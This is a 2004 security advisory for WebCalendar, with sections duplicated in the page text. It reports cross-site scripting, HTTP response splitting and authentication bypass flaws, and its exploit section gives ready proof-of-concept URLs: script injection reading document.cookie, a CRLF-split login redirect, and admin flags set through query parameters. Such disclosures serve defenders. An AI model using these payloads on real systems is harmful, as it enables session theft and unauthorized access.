WebCalendar Multiple Remote Vulnerabilities
BID:11651
Info
WebCalendar Multiple Remote Vulnerabilities
| Bugtraq ID: | 11651 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 10 2004 12:00AM |
| Updated: | Nov 10 2004 12:00AM |
| Credit: | Joxean Koret <[email protected]> disclosed these vulnerabilities. |
| Vulnerable: |
WebCalendar WebCalendar 0.9.44 WebCalendar WebCalendar 0.9.41 WebCalendar WebCalendar 0.9.40 WebCalendar WebCalendar 0.9.37 WebCalendar WebCalendar 0.9.34 WebCalendar WebCalendar 0.9.32 WebCalendar WebCalendar 0.9.31 WebCalendar WebCalendar 0.9.29 WebCalendar WebCalendar 0.9.27 WebCalendar WebCalendar 0.9.20 WebCalendar WebCalendar 0.9.19 WebCalendar WebCalendar 0.9.8 k5n WebCalendar 0.9.43 k5n WebCalendar 0.9.42 k5n WebCalendar 0.9.39 k5n WebCalendar 0.9.38 k5n WebCalendar 0.9.36 k5n WebCalendar 0.9.35 k5n WebCalendar 0.9.33 k5n WebCalendar 0.9.30 k5n WebCalendar 0.9.28 k5n WebCalendar 0.9.26 k5n WebCalendar 0.9.25 k5n WebCalendar 0.9.24 k5n WebCalendar 0.9.23 k5n WebCalendar 0.9.22 k5n WebCalendar 0.9.21 k5n WebCalendar 0.9.16 k5n WebCalendar 0.9.15 k5n WebCalendar 0.9.11 |
| Not Vulnerable: | |
Discussion
WebCalendar Multiple Remote Vulnerabilities
Multiple remote vulnerabilities are reported to exist in WebCalendar.
Multiple cross-site scripting vulnerabilites, an HTTP response splitting vulnerability, and two authentication bypass vulnerabilities are reported to exist in many different scripts in the affected application.
Fixes are reported to exist in the CVS version of the software.
Multiple remote vulnerabilities are reported to exist in WebCalendar.
Multiple cross-site scripting vulnerabilites, an HTTP response splitting vulnerability, and two authentication bypass vulnerabilities are reported to exist in many different scripts in the affected application.
Fixes are reported to exist in the CVS version of the software.
Exploit / POC
WebCalendar Multiple Remote Vulnerabilities
Examples have been provided for these issues.
Examples for cross-site scripting vulnerabilities:
http://www.example.com/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001
http://www.example.com/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009
http://www.example.com/usersel.php?form=editentryform.elements[20];%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2
http://www.example.com/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001
http://www.example.com/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001
http://www.example.com/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>
http://www.example.com/includes/styles.php?FONTS=asdf}%0A--></style><script>alert(document.cookie)</script>
Example for the HTTP response splitting vulnerability:
http://www.example.com/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi to all
Examples for the authentication bypass vulnerabilities:
http://www.example.com/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true
http://www.example.com/upcoming.php?public_must_be_enabled=true&public_access=Y
Examples have been provided for these issues.
Examples for cross-site scripting vulnerabilities:
http://www.example.com/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001
http://www.example.com/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009
http://www.example.com/usersel.php?form=editentryform.elements[20];%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2
http://www.example.com/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001
http://www.example.com/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001
http://www.example.com/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>
http://www.example.com/includes/styles.php?FONTS=asdf}%0A--></style><script>alert(document.cookie)</script>
Example for the HTTP response splitting vulnerability:
http://www.example.com/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi to all
Examples for the authentication bypass vulnerabilities:
http://www.example.com/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true
http://www.example.com/upcoming.php?public_must_be_enabled=true&public_access=Y
Solution / Fix
WebCalendar Multiple Remote Vulnerabilities
Solution:
It is reported that some, or all of these issues have been corrected in the CVS versions of the package. This has not been confirmed.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
It is reported that some, or all of these issues have been corrected in the CVS versions of the package. This has not been confirmed.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
WebCalendar Multiple Remote Vulnerabilities
References:
References:
- WebCalendar Home Page (WebCalendar)
- Multiple Vulnerabilities in WebCalendar (Joxean Koret
)